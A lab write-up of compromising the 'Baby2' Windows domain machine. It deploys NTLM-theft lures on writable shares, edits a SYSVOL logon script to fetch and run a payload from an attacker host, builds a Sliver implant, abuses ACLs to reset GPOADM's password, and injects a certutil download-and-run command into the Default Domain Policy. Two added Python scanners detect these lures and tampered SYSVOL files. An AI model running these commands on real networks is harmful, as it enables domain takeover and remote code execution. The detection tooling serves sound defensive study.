
Machine (Medium) - Baby2

Writeup Author: bobbuilder


Overview

Category: Machine

Difficulty: Medium

Machine Author: xct

Domain: Baby2.vl

Machine: Windows

Objective: This writeup documents the compromise of the Baby2 machine through enumeration of domain users, abuse of writable shares to capture credentials, domain privilege escalation using ACL abuse, and Group Policy Object (GPO) manipulation to achieve administrative access.


User

Enumeration

Enumerate Domain Users via SID Bruteforce

impacket-lookupsid baby2.vl/guest:''@<baby2_ip> -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
  • Discovers domain users by brute-forcing RIDs over an anonymous (guest) session; the awk column keeps only the DOMAIN\user names for the next step.

Extract SPNs for Kerberoasting

impacket-GetUserSPNs -target-domain baby2.vl -usersfile baby2_users.txt baby2.vl/guest -no-pass
  • Queries SPNs for the discovered user list over the guest session; only one entry, the DC$ machine account, is returned, potentially roastable.

Initial Access

Prepare NTLM Stealer Payloads

python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt
  • Generates files to trigger NTLM authentication back to attacker's server.

Upload Payloads to Writable User Folders

for user in "Amelia.Griffiths" "Harry.Shaw" "Kieran.Mitchell" "Mohammed.Harris" \
            "Joan.Jennings" "library" "Nicola.Lamb" "Carl.Moore" "Joel.Hurst" \
            "Lynda.Bailey" "Ryan.Jenkins"; do
    for file in ~/tools/ntlm_theft/nt/*; do
        filename=$(basename "$file")
        nxc smb <baby2_ip> -u 'guest' -p '' --share homes --put-file "$file" "\\$user\\$filename"
    done
done
  • Mass-deploys NTLM stealer files to users’ home directories on the writable SMB share.
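From the defender's side, the weak point here is a share where a guest session can write into other users' home folders, and where files that Explorer parses on folder view (.scf, .url, .lnk, desktop.ini, .library-ms) point at a host outside the domain. The following audit script is an added example written for this writeup, not part of the original post or of ntlm_theft; it walks a local copy (or mounted path) of the share, flags those file types, and extracts UNC and file:// hosts, reporting any that are not under a trusted domain. The sample share contents and the 10.8.0.2 address stand in for the page's `<attacker_ip>` and are constructed.

```python
import re
import tempfile
from pathlib import Path

# File types Explorer parses automatically when a folder is listed; a UNC
# path inside them makes the viewing user's machine authenticate outbound.
AUTO_CONNECT_EXTS = {".scf", ".url", ".lnk", ".library-ms"}
AUTO_CONNECT_NAMES = {"desktop.ini"}

UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9._-]*)\\")
FILE_URL_RE = re.compile(r"file://([A-Za-z0-9][A-Za-z0-9._-]*)/", re.IGNORECASE)


def is_trusted(host, trusted_suffixes):
    """A host is trusted when it equals, or sits under, one of the trusted domains."""
    h = host.lower()
    return any(h == s or h.endswith("." + s) for s in trusted_suffixes)


def scan_share(root, trusted_suffixes, max_bytes=64 * 1024):
    """Return sorted (relative_path, [reasons]) for every suspicious file under root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        if path.name.lower() in AUTO_CONNECT_NAMES or path.suffix.lower() in AUTO_CONNECT_EXTS:
            reasons.append("auto-connect file type")
        # latin-1 never fails to decode, so binary formats (.lnk) still yield searchable text
        text = path.read_bytes()[:max_bytes].decode("latin-1")
        hosts = set(UNC_RE.findall(text)) | set(FILE_URL_RE.findall(text))
        untrusted = sorted(h for h in hosts if not is_trusted(h, trusted_suffixes))
        if untrusted:
            reasons.append("references untrusted host(s): " + ", ".join(untrusted))
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return findings


def build_sample_share(base):
    """Write a constructed 'homes' share: two NTLM lures and two benign files."""
    base = Path(base)
    samples = {
        # .scf lure: IconFile points at a host outside the domain (constructed)
        "Carl.Moore/nt.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.8.0.2\\share\\nt.ico\r\n"
                             "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        # .url lure: file:// URL plus an IconFile on the same outside host (constructed)
        "library/nt.url": "[InternetShortcut]\r\nURL=file://10.8.0.2/share/nt.html\r\n"
                          "IconFile=\\\\10.8.0.2\\share\\nt.ico\r\n",
        # benign: a UNC path to a host inside the trusted domain
        "Amelia.Griffiths/notes.txt": "Printer queue moved to \\\\dc.baby2.vl\\print\r\n",
        "Harry.Shaw/todo.txt": "Renew certificate before Friday\r\n",
    }
    for rel, body in samples.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body.encode("latin-1"))
    return base


def run_demo():
    """Build the constructed share in a temp directory and scan it."""
    share = build_sample_share(tempfile.mkdtemp(prefix="homes_"))
    return scan_share(share, {"baby2.vl"})


if __name__ == "__main__":
    for rel, reasons in run_demo():
        print(f"{rel}: {'; '.join(reasons)}")
```

Run it against a mounted share path instead of the temp directory to audit a real environment; the durable fix is removing guest write access to other users' folders and blocking outbound SMB at the perimeter, which is what turns these lures into dead ends.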

Captured Credentials

baby2.vl/library:<REDACTED>
baby2.vl/Carl.Moore:<REDACTED>

Root

Post-Exploitation

Abuse Login Script for Code Execution

' Located in SYSVOL/baby2.vl/scripts/login.vbs
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl <attacker_ip>:8081/vl.exe -o C:\Windows\Temp\vl2.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\vl2.exe"
  • login.vbs in SYSVOL runs at every user logon; the modified script downloads the payload and executes it.

Generate Sliver Payload

sudo service sliver start
sliver
generate --os windows --arch 64bit --mtls <attacker_ip> --reconnect 60 --save vl.exe
  • Generates an mTLS implant (reconnecting every 60 s) with the Sliver framework; the resulting vl.exe is then served over HTTP for the login script to fetch.

Privilege Escalation

BloodHound Enumeration

  • Revealed user Amelia.Griffiths (member of BABY2\LEGACY) has WriteOwner over user GPOADM.

Import PowerView and Take Ownership

Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity GPOADM -OwnerIdentity Amelia.Griffiths
Add-DomainObjectACL -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths -Rights All
Set-DomainUserPassword -Identity GPOADM -AccountPassword (ConvertTo-SecureString 'Password1' -AsPlainText -Force)
  • Takes ownership of GPOADM, grants full rights, and sets a known password.

Abuse Default Domain GPO

python3 pygpoabuse.py BABY2.vl/gpoadm:Password1 -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -powershell -command "certutil -urlcache -split -f http://<attacker_ip>/vl.exe C:/Users/Public/vl.exe; C:/Users/Public/vl.exe" -f
  • Modifies the Default Domain Policy to deliver a Sliver payload and execute it.
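Both code-execution steps on this page land in SYSVOL: the edited logon script under scripts/ and, for the Default Domain Policy, an immediate scheduled task written to the policy's Machine/Preferences/ScheduledTasks/ScheduledTasks.xml. Because SYSVOL is replicated and readable by every domain member, a defender can diff or scan it on a schedule. The scanner below is an added example written for this writeup, not code from the original post or from pygpoabuse; it walks a SYSVOL-shaped tree, inspects logon scripts and Group Policy Preferences task XML, and flags anything that downloads from the network or runs a binary from a user-writable path. The directory layout and file contents are constructed (the 10.8.0.2 address stands in for `<attacker_ip>`), and the two policy GUIDs are the well-known Default Domain Policy and Default Domain Controllers Policy identifiers.

```python
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

SCRIPT_EXTS = {".vbs", ".bat", ".cmd", ".ps1"}

# Download tooling and user-writable drop locations, matching what the logon
# script and the GPO scheduled task on this page rely on.
DOWNLOAD_RE = re.compile(
    r"https?://|\bcurl\b|certutil\b[^\n]*-urlcache|Invoke-WebRequest|DownloadString|bitsadmin",
    re.IGNORECASE)
WRITABLE_RE = re.compile(
    r"c:[\\/]+windows[\\/]+temp|c:[\\/]+users[\\/]+public|\\appdata\\", re.IGNORECASE)


def classify(text):
    """Reasons a command line or script body is suspicious (empty list if none)."""
    reasons = []
    if DOWNLOAD_RE.search(text):
        reasons.append("downloads content from the network")
    if WRITABLE_RE.search(text):
        reasons.append("runs or writes a binary in a user-writable path")
    return reasons


def gpp_task_commands(xml_text):
    """Yield 'Command Arguments' for every TaskV2/ImmediateTaskV2 in a GPP ScheduledTasks.xml."""
    root = ET.fromstring(xml_text)
    for task in root.iter():
        if task.tag not in ("ImmediateTaskV2", "TaskV2"):
            continue
        for exe in task.iter("Exec"):
            cmd = exe.findtext("Command", default="")
            args = exe.findtext("Arguments", default="")
            yield f"{cmd} {args}".strip()


def scan_sysvol(root):
    """Return sorted (relative_path, [reasons]) for suspicious scripts and GPP tasks."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.suffix.lower() in SCRIPT_EXTS:
            reasons = classify(text)
        elif path.name.lower() == "scheduledtasks.xml":
            reasons = []
            for cmdline in gpp_task_commands(text):
                reasons += [r for r in classify(cmdline) if r not in reasons]
        else:
            continue
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return findings


DEFAULT_DOMAIN_POLICY = "{31B2F340-016D-11D2-945F-00C04FB984F9}"
DEFAULT_DC_POLICY = "{6AC1786C-016F-11D2-945F-00C04fB984F9}"

# Constructed SYSVOL contents: the tampered logon script, a benign drive-mapping
# script, a malicious immediate task in the Default Domain Policy and a benign
# task in the Default Domain Controllers Policy.
SAMPLE_TREE = {
    "baby2.vl/scripts/login.vbs": (
        'Set oShell = CreateObject("Wscript.Shell")\r\n'
        'oShell.run "cmd.exe /c curl 10.8.0.2:8081/vl.exe -o C:\\Windows\\Temp\\vl2.exe"\r\n'
        'oShell.run "cmd.exe /c C:\\Windows\\Temp\\vl2.exe"\r\n'),
    "baby2.vl/scripts/mapdrive.bat": "@echo off\r\nnet use H: \\\\dc\\homes /persistent:no\r\n",
    f"baby2.vl/Policies/{DEFAULT_DOMAIN_POLICY}/Machine/Preferences/ScheduledTasks/ScheduledTasks.xml": (
        '<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">'
        '<ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="TASK_constructed">'
        '<Properties action="C" name="TASK_constructed" runAs="NT AUTHORITY\\System" logonType="S4U">'
        '<Task version="1.3"><Actions Context="Author"><Exec><Command>cmd.exe</Command>'
        '<Arguments>/c certutil -urlcache -split -f http://10.8.0.2/vl.exe C:/Users/Public/vl.exe; '
        'C:/Users/Public/vl.exe</Arguments></Exec></Actions></Task></Properties>'
        '</ImmediateTaskV2></ScheduledTasks>'),
    f"baby2.vl/Policies/{DEFAULT_DC_POLICY}/Machine/Preferences/ScheduledTasks/ScheduledTasks.xml": (
        '<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">'
        '<TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Cleanup">'
        '<Properties action="U" name="Cleanup" runAs="NT AUTHORITY\\System" logonType="S4U">'
        '<Task version="1.3"><Actions Context="Author"><Exec>'
        '<Command>C:\\Windows\\System32\\cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments>'
        '</Exec></Actions></Task></Properties></TaskV2></ScheduledTasks>'),
}


def run_demo():
    """Materialise the constructed SYSVOL tree in a temp directory and scan it."""
    base = Path(tempfile.mkdtemp(prefix="sysvol_"))
    for rel, body in SAMPLE_TREE.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")
    return scan_sysvol(base)


if __name__ == "__main__":
    for rel, reasons in run_demo():
        print(f"{rel}: {'; '.join(reasons)}")
```

Point `scan_sysvol` at \\<dc>\SYSVOL mounted locally, or run it from a file-integrity job that diffs against the last known-good copy; a change to the Default Domain Policy is also visible as a bump of its versionNumber attribute (event 5136 on the groupPolicyContainer) and in the policy's GPT.INI, which gives a second, log-based signal for the same tampering.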